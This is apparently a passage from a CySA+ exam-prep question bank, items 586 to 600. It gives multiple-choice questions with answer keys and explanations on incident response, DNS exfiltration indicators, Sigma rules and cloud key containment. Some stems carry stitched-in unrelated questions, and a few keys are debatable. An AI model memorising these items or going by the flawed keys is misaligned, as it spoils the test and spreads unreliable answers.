Option A is correct because the immediate priority is to stop the data leak by restricting public read access to the storage bucket, then investigate whether sensitive data was actually accessed. This aligns with the incident response principle of containment before analysis. In cloud environments like AWS S3 or Azure Blob Storage, a bucket with public read access exposes all objects to the internet, and the first step is to apply a bucket policy or ACL to deny public access.

Exam trap

The CS0-003 exam often tests the misconception that rotating credentials (like database passwords) is a catch-all fix for data exposure, but the trap here is that the vulnerability is a misconfigured storage bucket, not compromised credentials, so the correct first step is to restrict public access and assess exposure.

How to eliminate wrong answers

Option B is wrong because waiting for the next quarterly review leaves sensitive customer data exposed to the internet for an extended period, violating data protection regulations and incident response best practices. Option C is wrong because rotating database administrator passwords does not address the root cause—a misconfigured storage bucket with public read access—and is an irrelevant action for this specific vulnerability.

586
Multi-Selectmedium

Which evidence helps distinguish a true brute-force attack from a misconfigured service account? (Choose two.)

Select 2 answers
A.The number of monitors used by the administrator
B.Source distribution and timing of failed logons
C.Whether one service account repeatedly fails after a password change
D.The brand of the office router only
AnswersB, C

Distributed or patterned failures suggest attack activity.

Why this answer

Option B is correct because a true brute-force attack typically originates from multiple source IP addresses or a single source with a high frequency of failed logons over a short time window, whereas a misconfigured service account usually fails from a consistent source at regular intervals. Analyzing the source distribution and timing of failed logons helps distinguish automated attack patterns from predictable service account behavior, such as retry intervals defined in application configuration.

Exam trap

The CS0-003 exam often tests the misconception that any repeated failed logon after a password change is evidence of an attack, when in fact it is a classic symptom of a misconfigured service account that has not been updated with the new credentials.

587
Multi-Selectmedium

Which three metrics are commonly used to measure the effectiveness of a security operations center (SOC)? (Select THREE.)

Select 3 answers
A.Number of firewall rules
B.Number of employees in the SOC
C.Mean Time to Respond (MTTR)
D.Mean Time to Remediate (MTTRem)
E.Mean Time to Detect (MTTD)
AnswersC, D, E

Measures response time.

Why this answer

MTTD, MTTR, and MTTRem are standard SOC metrics to measure detection and response effectiveness.

588
Multi-Selecthard

Which TWO of the following are indicators of potential data exfiltration via DNS?

Select 2 answers
A.Unusual TLS handshake patterns
B.Traffic to known malicious IPs over HTTP
C.Large number of NXDOMAIN responses
D.High volume of TXT record queries
E.Frequent queries to long subdomains
AnswersD, E

TXT records are commonly used to encode exfiltrated data.

Why this answer

Option D is correct because TXT records are commonly used in DNS tunneling to encode exfiltrated data. Attackers embed data in TXT record queries or responses, and a high volume of such queries is a strong indicator of data exfiltration via DNS.

Exam trap

CompTIA often tests the distinction between DNS tunneling indicators (TXT record volume and long subdomains) and other DNS anomalies like NXDOMAIN responses, which are more associated with DGA or reconnaissance rather than exfiltration.

589
Multi-Selectmedium

An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?

Select 2 answers
A.File Size: > 1 MB
B.Parent Process: explorer.exe
C.Process Name: rundll32.exe
D.Image Path: C:\Windows\System32\rundll32.exe
E.Command Line: contains *\Temp\*.dll
AnswersC, E

Targeting rundll32.exe reduces false positives from other processes.

Why this answer

To avoid false positives, the rule should specify the process name (rundll32.exe) and the command-line argument containing a path to a temp directory, as legitimate uses rarely involve DLLs from temp folders.

590
MCQeasy

In a regulated payment environment, an incident was contained successfully, but delayed escalation allowed the attacker more dwell time. What should the post-incident review produce? During eradication, which decision is most defensible? Which action best reduces risk without losing evidence?

A.A generic statement that security is important
B.Deletion of all incident tickets
C.A blame list of individual analysts
D.Specific playbook updates, escalation triggers, owners, and due dates
AnswerD

Lessons learned should translate findings into trackable process improvements. In eradication, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because a post-incident review in a regulated payment environment must produce actionable improvements to prevent recurrence. Delayed escalation indicates a failure in detection or notification procedures, so the review should yield specific playbook updates, escalation triggers, assigned owners, and due dates to ensure timely response in future incidents. This aligns with NIST SP 800-61r2 and PCI DSS requirements for continuous improvement of incident response processes.

Exam trap

The CS0-003 exam often tests the misconception that post-incident reviews are about assigning blame or deleting evidence, rather than focusing on process improvement and evidence preservation.

How to eliminate wrong answers

Option A is wrong because a generic statement that security is important provides no measurable, actionable steps to fix the identified procedural gap, and would fail audit scrutiny in a regulated environment. Option B is wrong because deletion of all incident tickets violates evidence preservation requirements under regulations like PCI DSS and GDPR, and destroys the forensic trail needed for root cause analysis and legal proceedings. Option C is wrong because a blame list of individual analysts creates a punitive culture that discourages reporting and collaboration, and does not address the systemic process failure that allowed delayed escalation.

591
MCQmedium

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a finance workstation to a known malicious IP address at 2:00 AM. The analyst checks the firewall logs and sees a single connection. Which action should the analyst take FIRST according to NIST SP 800-61?

A.Validate the incident by reviewing additional data sources.
B.Run a full antivirus scan on the workstation.
C.Isolate the workstation from the network immediately.
D.Notify law enforcement per the incident response plan.
AnswerA

Validation ensures the alert is a true incident, reducing false positives.

Why this answer

NIST SP 800-61 emphasizes that during detection and analysis, the first step is to validate the incident as a true positive before escalating or containing. The analyst should confirm the alert is not a false positive by gathering additional evidence.

592
MCQhard

An organization's compliance dashboard shows a control effectiveness score of 85%. Which type of evidence best supports this score?

A.Incident response logs
B.Employee training records
C.Vendor documentation
D.Penetration test results and audit reports
AnswerD

These provide objective evidence of control performance.

Why this answer

Control effectiveness evidence, such as penetration test results and audit reports, directly demonstrates how well controls are working.

593
Multi-Selectmedium

During containment of a compromised cloud access key, which actions are appropriate? (Choose two.)

Select 2 answers
A.Review audit logs for actions performed with the key
B.Only delete the public repository commit
C.Grant the key administrator privileges for investigation
D.Disable or rotate the exposed key
AnswersA, D

Audit review establishes scope and impact.

Why this answer

Reviewing audit logs for actions performed with the compromised key is appropriate during containment because it allows the incident response team to determine the scope of unauthorized access, identify affected resources, and understand the attacker's actions. This step is critical for informed decision-making before revoking or rotating the key, ensuring that legitimate operations are not disrupted and that forensic evidence is preserved.

Exam trap

The CS0-003 exam often tests the misconception that immediate revocation or deletion of the key is the only containment step, but the correct approach requires first auditing the key's usage to understand the full impact before taking irreversible actions.

594
MCQmedium

A security analyst receives an alert from the HIDS indicating that a critical configuration file was modified unexpectedly. What is the best immediate action?

A.Ignore the alert as HIDS false positives are common
B.Immediately revert the file and block any similar changes
C.Check the change management system to see if the change was approved
D.Restore the file from a known good backup
AnswerC

Determines if modification is legitimate.

Why this answer

Option C is correct because the best immediate action when a HIDS alerts on a critical configuration file change is to first verify whether the change was authorized through the change management system. This aligns with the incident response process of validation before remediation; reverting or restoring without checking could disrupt approved maintenance or patch deployments. HIDS monitors file integrity via checksums (e.g., SHA-256), but it cannot distinguish approved changes from malicious ones without external context.

Exam trap

The CS0-003 exam often tests the principle that immediate remediation (reverting or restoring) is not the best first step; candidates mistakenly jump to containment actions without validating whether the change was authorized, confusing incident response speed with due diligence.

How to eliminate wrong answers

Option A is wrong because ignoring HIDS alerts on critical configuration files is negligent; while false positives can occur, dismissing them without investigation violates security operations best practices and could allow a breach to go undetected. Option B is wrong because immediately reverting the file and blocking changes is premature and could undo an authorized change (e.g., a scheduled security patch or configuration update), potentially causing service disruption or compliance issues. Option D is wrong because restoring from a known good backup is a remediation step that should only be taken after confirming the change was unauthorized; doing so without checking change management could overwrite legitimate modifications and lose audit trail data.

595
Multi-Selectmedium

During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?

Select 2 answers
A.AWS Shield
B.AWS CloudTrail
C.AWS WAF
D.AWS Config
E.Amazon GuardDuty
AnswersB, E

CloudTrail logs all API calls and is essential for auditing user activity.

Why this answer

AWS CloudTrail records API activity, and GuardDuty provides threat detection. Both are native services for investigation.

596
MCQmedium

A business unit accepts the risk of delaying a patch because downtime would breach a contractual deadline. What should be updated? For validation, which action should be taken before closing or downgrading the finding?

A.The risk register with owner, justification, expiry date, and compensating controls
B.The firewall vendor invoice
C.The incident containment playbook only
D.The phishing training completion list
AnswerA

Risk acceptance must be explicit, time-bound, owned, and controlled.

Why this answer

When a business unit formally accepts the risk of delaying a patch due to contractual constraints, the risk must be documented in the risk register. This entry should include the owner, justification, expiry date, and compensating controls to ensure the risk is tracked, reviewed, and eventually remediated. This aligns with the vulnerability management lifecycle, where accepted risks require formal documentation and periodic reassessment.

Exam trap

The CS0-003 exam often tests the distinction between risk acceptance documentation (risk register) and operational documents (playbooks, invoices), tricking candidates into thinking any update related to the delay is sufficient, when only the risk register captures the formal acceptance process.

How to eliminate wrong answers

Option B is wrong because the firewall vendor invoice is a financial document unrelated to risk acceptance or vulnerability management; it does not track risk decisions or compensating controls. Option C is wrong because the incident containment playbook is designed for active incident response, not for documenting accepted risks from delayed patching; updating it would not address the need to formally record the risk acceptance.

597
MCQhard

A cloud security team is using a container image scanning tool and finds a vulnerability in a base image used by many containers. The vulnerability is rated CVSS 7.5 and has a high EPSS score. However, rebuilding all containers with a patched base image will take significant time. What is the best immediate action?

A.Wait for the next scheduled rebuild cycle to patch the base image.
B.Apply a hotfix or workaround to the affected package in running containers.
C.Increase network segmentation to limit exposure from the vulnerability.
D.Remove all containers using the vulnerable base image immediately.
AnswerB

Provides immediate protection while planning full rebuild.

Why this answer

With high exploitability (EPSS), immediate action is needed. Applying a hotfix or workaround, such as updating the affected package in running containers, reduces risk while a full rebuild is planned.

598
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

A.False positive
B.False negative
C.True negative
D.True positive
AnswerD

The alert correctly identified a real security event.

Why this answer

The alert was triggered by a real failed login attempt from an internal IP, and because the account owner is on vacation, the attempt likely indicates unauthorized activity. Since the alert corresponds to a real security event, it is a true positive.

599
MCQhard

During a threat hunting exercise, an analyst formulates a hypothesis that an attacker may be using DNS tunneling to exfiltrate data. Which data source would provide the best evidence to confirm or deny this hypothesis?

A.Firewall logs showing allowed outbound connections
B.NetFlow records from the border router
C.Endpoint detection and response (EDR) logs showing DNS client activity
D.Deep packet inspection (DPI) of DNS traffic
AnswerD

DPI reveals content of DNS packets which can indicate tunneling.

Why this answer

Deep packet inspection (DPI) of DNS traffic is the best evidence because DNS tunneling works by encoding data within DNS queries and responses, often using non-standard record types (e.g., TXT, NULL) or unusually long domain names. DPI can decode the payload within DNS packets to reveal hidden data, whereas other methods only see metadata or connection summaries. This allows the analyst to directly inspect the content of DNS messages for signs of exfiltration, such as base64-encoded data or anomalous query patterns.

Exam trap

The CS0-003 exam often tests the misconception that NetFlow or firewall logs are sufficient for detecting data exfiltration, when in reality only deep packet inspection can reveal the payload content necessary to confirm DNS tunneling.

How to eliminate wrong answers

Option A is wrong because firewall logs showing allowed outbound connections only indicate that traffic passed through the firewall, not the content or structure of DNS packets; they cannot reveal whether data is being tunneled within DNS. Option B is wrong because NetFlow records from the border router provide metadata such as source/destination IPs, ports, and byte counts, but they lack the payload-level detail needed to detect encoded data inside DNS queries or responses. Option C is wrong because EDR logs showing DNS client activity typically record process-level events (e.g., which process made a DNS query) but do not capture the full DNS packet payload, making them insufficient to identify tunneling without additional deep inspection.

600
MCQmedium

A security analyst is triaging an alert indicating that a user's workstation has been infected with ransomware. The file server shows signs of encryption. The analyst needs to contain the incident. Which action should the analyst take FIRST to minimize damage?

A.Running a full antivirus scan on the workstation
B.Disabling the user's Active Directory account
C.Rebuilding the workstation from a known good image
D.Disconnecting the workstation from the network
AnswerD

This is a short-term containment action that isolates the compromised system.

Why this answer

Disconnecting the infected workstation from the network stops the ransomware from spreading to other systems via network shares.
